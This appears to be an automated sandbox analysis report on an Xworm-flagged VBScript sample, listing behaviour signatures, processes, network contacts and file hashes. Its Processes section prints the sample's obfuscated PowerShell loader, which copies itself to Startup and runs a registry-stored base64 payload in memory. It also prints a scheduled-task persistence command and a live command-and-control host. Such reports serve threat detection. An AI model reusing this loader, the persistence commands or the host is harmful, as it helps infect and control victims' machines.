Analysis Overview
SHA256
825d0918656842496be2186889202fd231c7f823f2a8f788e7a8a2f3b91e1c28
Threat Level: Known bad
The file FUD.vbs was found to be: Known bad.
Malicious Activity Summary
Xworm
Detect Xworm Payload
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Drops startup file
Adds Run key to start application
Looks up external IP address via web service
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-21 20:40
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-21 20:40
Reported
2024-06-21 20:45
Platform
win11-20240611-en
Max time kernel
91s
Max time network
202s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pro hacker.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows backup.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows backup.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pro hacker.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows backup = "C:\\Users\\Admin\\Windows backup" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FUD.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -Command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\FUD.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pro hacker.vbs'; $impounding = ((Get-ItemProperty HKCU:\Software\Chrome\).Updates); $impounding = -join $impounding[-1..-$impounding.Length];[<##>AppDomain<##>]::<##>('nonconstructivenessurrentDomain'.replace('nonconstructiveness','C'))<##>.<##>('handhiddenoad'.replace('handhidden','L'))([Convert]::FromBase64String($impounding))<##>.<##>('dynamistsntryPoint'.replace('dynamists','E'))<##>.<##>('Inpandiedoke'.replace('pandied','v'))($Null,$Null)<##>;
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows backup" /tr "C:\Users\Admin\Windows backup"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /f /tn "Windows backup"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp55EB.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 147.185.221.20:23695 | modern-educators.gl.at.ply.gg | tcp |
| US | 147.185.221.20:23695 | modern-educators.gl.at.ply.gg | tcp |
Files
memory/3756-0-0x00007FFD88A13000-0x00007FFD88A15000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g3n3c3uq.euk.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3756-9-0x0000018809150000-0x0000018809172000-memory.dmp
memory/3756-10-0x00007FFD88A10000-0x00007FFD894D2000-memory.dmp
memory/3756-11-0x00007FFD88A10000-0x00007FFD894D2000-memory.dmp
memory/3756-12-0x00007FFD88A10000-0x00007FFD894D2000-memory.dmp
memory/3756-13-0x00000188216E0000-0x0000018821726000-memory.dmp
memory/3756-15-0x00000188212E0000-0x00000188212F0000-memory.dmp
memory/3756-20-0x0000018821B90000-0x0000018821B9C000-memory.dmp
memory/3756-21-0x00007FFD88A13000-0x00007FFD88A15000-memory.dmp
memory/3756-22-0x00007FFD88A10000-0x00007FFD894D2000-memory.dmp
memory/3756-23-0x00007FFD88A10000-0x00007FFD894D2000-memory.dmp
C:\Users\Admin\Desktop\Microsoft Edge.lnk
| MD5 | 8bd6778743049548d88fd68cead40673 |
| SHA1 | 055c8880b05a6944d61960d0ef9ae2ab8d2d6d13 |
| SHA256 | 1b9dd459eee3286e207f80698e90ac599b61e2613141b391c318a10caf54fa72 |
| SHA512 | a42b4a948de6c8552a9954e88c84eb08ae212653bf920e3a905bcb652ecf76ad81b55e23443b053cbadd62b44274372b39171c3a2a0f1e5634bee2a0708c8db4 |
C:\Users\Public\Desktop\Acrobat Reader DC.lnk
| MD5 | 3332937217e7fc3a5994f76f77e4a494 |
| SHA1 | 2c41a6c81255c2854ce06fe91595c82d1286960d |
| SHA256 | 17773d25ce1e097da6df927e39f80645cec3285f6a1b7ab29bb818e67bf4cc63 |
| SHA512 | c42aaa6db3f76a671d3aab8fc4acaa3a6b7825d1a54795639708530fc4ba361c54e004cc1119b72786cdec59eeadcef76752887ba476db84ca66f44993205573 |
C:\Users\Public\Desktop\VLC media player.lnk
| MD5 | 0c7a77608acbf8767fe0441b8d33e842 |
| SHA1 | 4676d9815f8c50bd9b92fe22ace1031e537e27a9 |
| SHA256 | 4a9d8837aa082ff9716ec74f9c4b9d164ea1f4246b324b6e8e17f9de61e1fa46 |
| SHA512 | 8ce663cd75bd65fdbcd51d4b71484d926ed80f5950b9379156c0fdaee10c4fd3bf575803bc1b2f146f0e5619bba9bf9477d3c8919c2ff0b67f54c075dc592d7d |
C:\Users\Public\Desktop\Firefox.lnk
| MD5 | 2c07f1e472e3cba6aa935cfafca03051 |
| SHA1 | 9691fb753c4fb7f1ea26781b08f26cab6e4ba22c |
| SHA256 | 32d675963d02343c0854fef3b004b57413e11571e0b8f8c94e468550d73df7e9 |
| SHA512 | 2261be317c330e91fa76a2f7ba9836ed411014ea1ddc22eb9062c044bf21fd858f7211bf199f7ac7474306af9700ee8956c11c6d6d65b89cc2d5e63412ac05dd |
C:\Users\Public\Desktop\Google Chrome.lnk
| MD5 | d1435ac505580e87f8a3b30d2fe93a99 |
| SHA1 | e0f85c87d90a326bdaa3f7e5bad4fa090599698f |
| SHA256 | a6e73a4bc4305745a8211123e806a39dc4f3149c19bc1a89d62e6ae2b6f824bd |
| SHA512 | 35b4838de98e194ab9285d9d6f19090aab7d397a677648fb4011735c66cd776f1679ff47658b1ad924dc5c1481903facd3dafb7d351d3c698318a452dc1c1880 |
C:\Users\Admin\Desktop\ConfirmSend.odt
| MD5 | 94a8a32cf8dfddf84632d0a3c33cefe5 |
| SHA1 | bbede4cf5f5691dc13be3a227cf5dacf69620c95 |
| SHA256 | b9d852b551bce67e2a5c0b35ac415c81e541b5ac38034fdc29ab8675b1d7c09c |
| SHA512 | b0694d60e86e647e91244f560fee19c83bf3357ac40608e1bd7e20781eb02bc256a873ed0257acc2aff26fe1f5a8161526f8bfcd4354cd1d32b4690b62d8d732 |
C:\Users\Admin\Desktop\DismountExport.wmv
| MD5 | dbbc8bad95d94a4815747f867a735ca1 |
| SHA1 | 0fa74d91c3aedc1ea05592a9f88a53040bb6d4b1 |
| SHA256 | 70fb38cd728c7f53bbabcf5d513ca46a8c8ec69e39e919ff012de3fcfd6a3602 |
| SHA512 | b66f5e0436c96f834995da554749d018813511ef7ecfa63bae21cd122ad128c0613df6b862c394caea4f9013fc49577a0e32ac98ac695aa4c673d51ee42e6989 |
C:\Users\Admin\Desktop\ConnectStop.tif
| MD5 | cc353cf6bed7da0eac3e767eaf403666 |
| SHA1 | 4b451a58656fe9038d815a3da8099bc90d6cd80d |
| SHA256 | cee873ccd4bc25d5d3650076866d946bd65369ba551259514f229a0f77c770c9 |
| SHA512 | 0595e02a4c84622eec931199cc30016d66b9de741bc3ace82e6b2d501ec1aaeb70f6903be857d68bca5c649d493e80e4fe68aea63a8095c4eae3bd30d2d6de2d |
C:\Users\Admin\Desktop\EnableCopy.7z
| MD5 | fd1e66e0b4ee59c00a3faee2c3909220 |
| SHA1 | d1a2e3ccc183e948f3f3cecd9f7d678ee83359b8 |
| SHA256 | d20ca151c4250e1b7098a396133745bc7d14e5ab58ceebdde505e211d4550c68 |
| SHA512 | bf369cef7b6f550d168529e7befff98530353ac67d6deb21f0f65b419267bc6380b50f060eaa332f9f4f96c4c658e61395c4d52342d6e08a8b145da5023ac420 |
C:\Users\Admin\Desktop\FindStep.css
| MD5 | ef4d554bfd99d8da1ae8eb52f88e485e |
| SHA1 | a940f9c9ca9c3f9c466e5e250c4681900b6af287 |
| SHA256 | 8f4eb7fe0d8991bf95ee95e79b9b8af0ffeef9607ed1cd30372f24fc1238eb30 |
| SHA512 | 97318d4bcf043b4c64b6dbc695e1edb0a8f976cff179387d4d7353d2aec2fdcf572606d1e56ec26e254b9aecfb3e05bb1fdd2d60847b14a06633a60cc6526b56 |
C:\Users\Admin\Desktop\ExpandDebug.jpg
| MD5 | e8b13804c289df44e8434f76b05e9c15 |
| SHA1 | 5db6b63657391a93e0413be87681922aec3932ce |
| SHA256 | 43552fe4655dfa5826292625dc20ebd8903a5943e60e10fad5f2d9ca43cf7208 |
| SHA512 | 80c9028b4d8d3f720be48e9f1e43f4955052bc93ccc689bc8229d8f20e15955776961ad98f8e9be05861a4175fc6b4ea82301f03456a7aaeeceb16333fbfb856 |
C:\Users\Admin\Desktop\FindUse.docx
| MD5 | 6c3e664da2573086709d18b3d777786e |
| SHA1 | 5b93a74805353a27e2570f125f4ed2ac8ce6781c |
| SHA256 | 455640aced94e6bc1e54c008d34a132c2e918dfff7685e81b39d298e8d5555e1 |
| SHA512 | 4b70b2e62dec3ba0f8745d4d9c8f5e21d366217a67243571967a8fbbad8198b1832270549819530fd7834f777c55c4b69ae15899f70122b13ab64f2a20977da4 |
C:\Users\Admin\Desktop\OutDisable.jfif
| MD5 | 338c2df1c8f6fcc751831566d950252a |
| SHA1 | 062324cc77147ccb00810c7cad98bc3424b39fdb |
| SHA256 | e75bea9ed43b12e5ae88d8b154d94145e60244ef1ae40fe6ed2f4f34e8227df2 |
| SHA512 | dd6c27891acdd1324d659692d28a75780141e4c08bd8e845eadbe48d20740be67d42bcffbadb09cf52f1e3706c13f3d970e30c60c100a15ad46720de4422df99 |
C:\Users\Admin\Desktop\OutSwitch.html
| MD5 | 6bd9b40e6c55f845e0c93c0996d50767 |
| SHA1 | 1426b8994e7943f9705a6544179bf1be617d43d3 |
| SHA256 | 057a7d47a4a33b9b5a035a8c78319cc2d83a97e011c6d4e6c20813bdfddfc7a3 |
| SHA512 | 6dd44dc0e178f4ef743884072e19b026a3d9c7fb633453295cefaf9a64d683d872edc7fe09a6a2078fdd446d0b448157e020a9a47906b1be1daf86657ac26eec |
C:\Users\Admin\Desktop\PingOut.txt
| MD5 | c32c641439e79a72c3136f286f8e5237 |
| SHA1 | 317f0e592b5d7a108740540de16e4f780c1c445a |
| SHA256 | a002f64564a71b51de263d2d6af5d94744d622bd6286c48056666c700dc5175e |
| SHA512 | 07232dd5dfac74dffe13ffb599d1b5516d284da4bd18cf059024ffd1023b9e8793ebab1b1fc1a1dfc0c699725f2dd5a8e311610946ca895eb1b3de068958f944 |
C:\Users\Admin\Desktop\ReadConnect.jpg
| MD5 | 0bba5dc28e5a60f457a07f78b5d3e43d |
| SHA1 | 8f3e60b559288f3b77a7c4e95b88db5a36a2dd77 |
| SHA256 | 02ad4361ff95ee2f909551d9a6a296986c726ac2cefd9197f12c1ac72928e655 |
| SHA512 | 6f69fac496cfe876b41367d366a85615d581586b7e99df9a941c129b5b85cfc3ef7f7880a07a922415ca0ff089e58b59e617c874594e06b9f582a8287675f31a |
C:\Users\Admin\Desktop\RegisterDebug.wpl
| MD5 | e20053933becd770dcab6630cdb74748 |
| SHA1 | 1df3571a0f00605e1e41138278f1d63618d0ddac |
| SHA256 | 083b13b7d04ed76220aa1fb1cd77a3572a509f52b738a90d40ffc607f3f7caea |
| SHA512 | b41c6a80ca606c7ed3659ff16ee74c3a4d9a1d30d084c578f4cc333c7b00bbd61fcd2976aafd44b76a6dec7d420309e774fa01344537bc18178d53ec27500623 |
C:\Users\Admin\Desktop\ResizeMerge.rtf
| MD5 | 14ad2250e861ea5bfd01f789972188ee |
| SHA1 | 3f8fb9415f9bb4946c777a5af1457073711411c0 |
| SHA256 | d5bb46894d0c200773ab8ec232a0ade11e0b43f1bdfe51cfcece93c60fd8b585 |
| SHA512 | 0f9e13278dad276b21c29ef7de8624d1d27951fa5f5e533eaa6e267c391b799961b72774c9193ec45a31081bd50805bfc9d5abd8713960819b8a6e654f9cf22a |
C:\Users\Admin\Desktop\ResizeTest.odp
| MD5 | d321c265ba7a2b313d2d6bc30c1e0a37 |
| SHA1 | 5c2a1d17feb7259d457f6d8fa5058db5afec9c94 |
| SHA256 | 79f81c327985134d74e978430537bd7eb8d7f9b65c775a0b4dc1ea433d41cf7f |
| SHA512 | b9c1efbaff2677169a2fc325c5ef5f0a4f92461c99d313726149958e6123a849e3be3e0e61a9dde4c92a701111353c84b036858bf2f4f2b3f7bc980a44caba52 |
C:\Users\Admin\Desktop\UseExpand.m1v
| MD5 | aa87869e275995b1e6387212d049b9b7 |
| SHA1 | 12fe2f5bb81cab5c76970bb5901d8b1e4fadc51f |
| SHA256 | 3fd0912caebe501ae112787a2621fd31ce67c2b0e9b8d07af357db6668d50350 |
| SHA512 | 05783195dcc067fd4c3e316f56d1a27af8aa364f1f89b89638e91c114521877c008bd552856fc92c02deacb3d95cc98316f7ebac76da5eacd086d41bc1f871b0 |
C:\Users\Admin\Desktop\UndoSplit.mid
| MD5 | e711276eec6f475322a7632e9b291938 |
| SHA1 | 3e47b6207c8d8b62a2f6ca27bc51377c02b545be |
| SHA256 | 407492babb42b73c36fed75f5092f33f8948f2ca4111ecdfed87d412f3b3edbf |
| SHA512 | 6e2ff1c158d6c000bbe0a83f9c2cd8deb7d4f8357a70ca8d281aa39993c822f0d81be6382c5a7757cd1daf261d486f50d91a75708d67858872d9912f79db7594 |
C:\Users\Admin\Desktop\UnblockUnprotect.odt
| MD5 | fc2a7db6ced77008f49ea76806253610 |
| SHA1 | 73049c82c2a8760bf4aa298b7c9ac8289764d2cb |
| SHA256 | 67bf4980fa5e358ecca3b8fa39a066c338efd9182cedcf6db9231f288c415b7c |
| SHA512 | d86b4ed7beedd9c0a8fae80dfd799f319652bbc284591c89d181e294cd72b01acaf715bdeac3d6cec6d2d4fb96b2c3ed19a5d536615e0e381015eeca6788f83c |
C:\Users\Admin\Desktop\SyncGrant.rm
| MD5 | 7b6f067931ad6057c806bacb5068fdc7 |
| SHA1 | bd98c7e26f0302b1bd5b935f684a39b9239ff4c0 |
| SHA256 | 6de88ea9fe9eb233c4be7b77280374065d2ec18e40bd55645ce15c5b3e4cf9dd |
| SHA512 | 209aa77605fa8e4aabd229473da671f13e1ab814e6bad3a4191eb300fa0d7a122f1f701cb7c8e7ac452d424b1c4bf59a4d82b32f0db3ee273c2fd29547fe34b9 |
C:\Users\Admin\Desktop\SwitchSubmit.iso
| MD5 | 3936334591fabba1ab7c66613cae789a |
| SHA1 | fb7327e15408e4b2d13598ef68f91765a409e560 |
| SHA256 | 8532511d4abfa14d335e672144566f63d1d18b527bc2f54b957fea79d95d29d2 |
| SHA512 | 30fae0d788258b0bc729d3fb12e99de4f90bf2faec9d61399b87ee82d2bbb0eb341c4b57fc014606fd9a756bfffa101976779b832f80be93d898f560e0c2eceb |
C:\Users\Admin\Desktop\RevokeEdit.dot
| MD5 | af6d1580060269b90686aabe1833f61e |
| SHA1 | e1a8da0f2723e7eaa51d5b3c575f674fe745de05 |
| SHA256 | e16b73836a15d028600ae095b74f20438b514453788e46f9866ccbd2e34c5a6c |
| SHA512 | f73f3c452ba7c1696e9e3704b83449ab2fdfacdccd7dc90fd5d656614e69e0c0272e3a8f8f624b5139da60f4130a587de0d213451271fabaecf7fe91aaac601d |
C:\Users\Admin\Desktop\ExportReset.xlsx
| MD5 | 0542f85297fe66c231d4eec49bd8313a |
| SHA1 | 10ceb5155363beaf47449b980f8a16efabaeca20 |
| SHA256 | 1184982bddc6bed09acd573f05343309084b16f248f203e3156739e3c5fb8dfe |
| SHA512 | 32ed3c5ee4be97a98fbf803c927c45abf940580b6fd434eca8546f45e01b9d363073aad51c2b3c68573f2b1734e2a370cf87038358ed0fc912d607b265db004b |
C:\Users\Admin\Desktop\PopDeny.docx
| MD5 | e87cff96a2978aecda7de6575ab7526f |
| SHA1 | 183494e887ec59366f4e9b31dec50f74c1854b9d |
| SHA256 | 45a7ff7d9b2cb3d0a67591a23f8307003e57187d6dd9a30906af645802990e26 |
| SHA512 | 671c8f1b41d5d2e91e49a9fbde1e4a92b4ce104a7ea301a5ac5c37dcfb434b97e9df080616cc8f49dbad769802586b5b3b75920d38ccdd3f0af52e53ec9a3cee |
C:\Users\Admin\Desktop\UseSkip.rle
| MD5 | b5799340ca2c56b3f188bdfaf3e95cc8 |
| SHA1 | cf3bece36d59c0ae21be2798eadf57114ea2c946 |
| SHA256 | b6d9b58735f9447ceab09849fbdacb8c65d536ed36d57dd1dbba498f56c6cbf5 |
| SHA512 | d60400cf8200b864852ffa17c112a036034266d8c58cc870f51a29310f09006b4d17471eea1f5c05dd9e1a99b5a82e119158a460d88619a50268b79b0674f21b |
C:\Users\Admin\Desktop\CloseRevoke.exe
| MD5 | 7986b3b517f489617d79108122fcd8cf |
| SHA1 | 84f552ae09664b01d7373e991b1a13de4e87b9a9 |
| SHA256 | 8db9f6122ec98cb9b193f686b1c14beabd5d704dae837aa9b681f81ecb65acf5 |
| SHA512 | cbc0b992724221bc0c9afd2c8632d8624a3804ab6517d48f5f215d2611ee3dc06d620db114546b11102506887daa0cc5b222438e63833fb1e5fecd3e837e4254 |
C:\Users\Admin\Desktop\SkipCopy.cab
| MD5 | ac78f601094e989bcd642b1badeb7e83 |
| SHA1 | 85c4c32d0e496c975fc92275746c3c9de24c43b5 |
| SHA256 | d3c920184d9491cb7ae8b57000be92a3508345df70d471a67698a29b55d5c400 |
| SHA512 | 9ed4f93a34fdebaac9ccf2285f1c8b77bf238b5c451fb1ffefb00e8c6d7024b0abe99d6f2e9c28de9d2f3a5cd12cec308dddb6eadfd116499f00b8d169cb99a1 |
C:\Users\Admin\AppData\Local\Temp\tmp55EB.tmp.bat
| MD5 | 7042c11eb8fc9c15c066d2a6ae961964 |
| SHA1 | a40c23cbf8ab7b28c7d1a11a4614ae906220468a |
| SHA256 | aa183b22bfd130bcdd19b054ab7c707efd2c05086c64c76cfcb00cc760880535 |
| SHA512 | fceca003d2095e4a20299e1bc89dd67ca46322119c384384112e94a6693dfae8ce9ad6e6b9923bb7d6329bab3642589688964021b5b15238caf33dfb22d4fcf5 |
memory/3756-63-0x00007FFD88A10000-0x00007FFD894D2000-memory.dmp